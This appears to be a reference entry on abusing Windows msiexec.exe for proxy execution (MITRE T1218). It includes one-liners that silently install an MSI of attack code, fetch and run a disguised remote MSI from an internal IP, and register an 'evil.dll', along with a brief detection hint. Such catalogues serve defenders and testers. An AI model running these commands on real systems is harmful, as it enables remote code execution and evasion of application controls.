.. / Msiexec.exe
Star

Used by Windows to execute msi files


Paths:


Resources:
https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
https://twitter.com/PhilipTsukerman/status/992021361106268161

Acknowledgement:
netbiosX - @netbiosX
Philip Tsukerman - @PhilipTsukerman


Detection:
msiexec.exe getting files from Internet



Execute

Installs the target .MSI file silently.
msiexec /quiet /i cmd.msi
Usecase:Execute custom made msi file with attack code
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1218



Installs the target remote & renamed .MSI file silently.
msiexec /q /i http://192.168.100.3/tmp/cmd.png
Usecase:Execute custom made msi file with attack code from remote server
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1218



Calls DLLRegisterServer to register the target DLL.
msiexec /y "C:\folder\evil.dll"
Usecase:Execute dll files
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1218



Calls DLLRegisterServer to un-register the target DLL.
msiexec /z "C:\folder\evil.dll"
Usecase:Execute dll files
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1218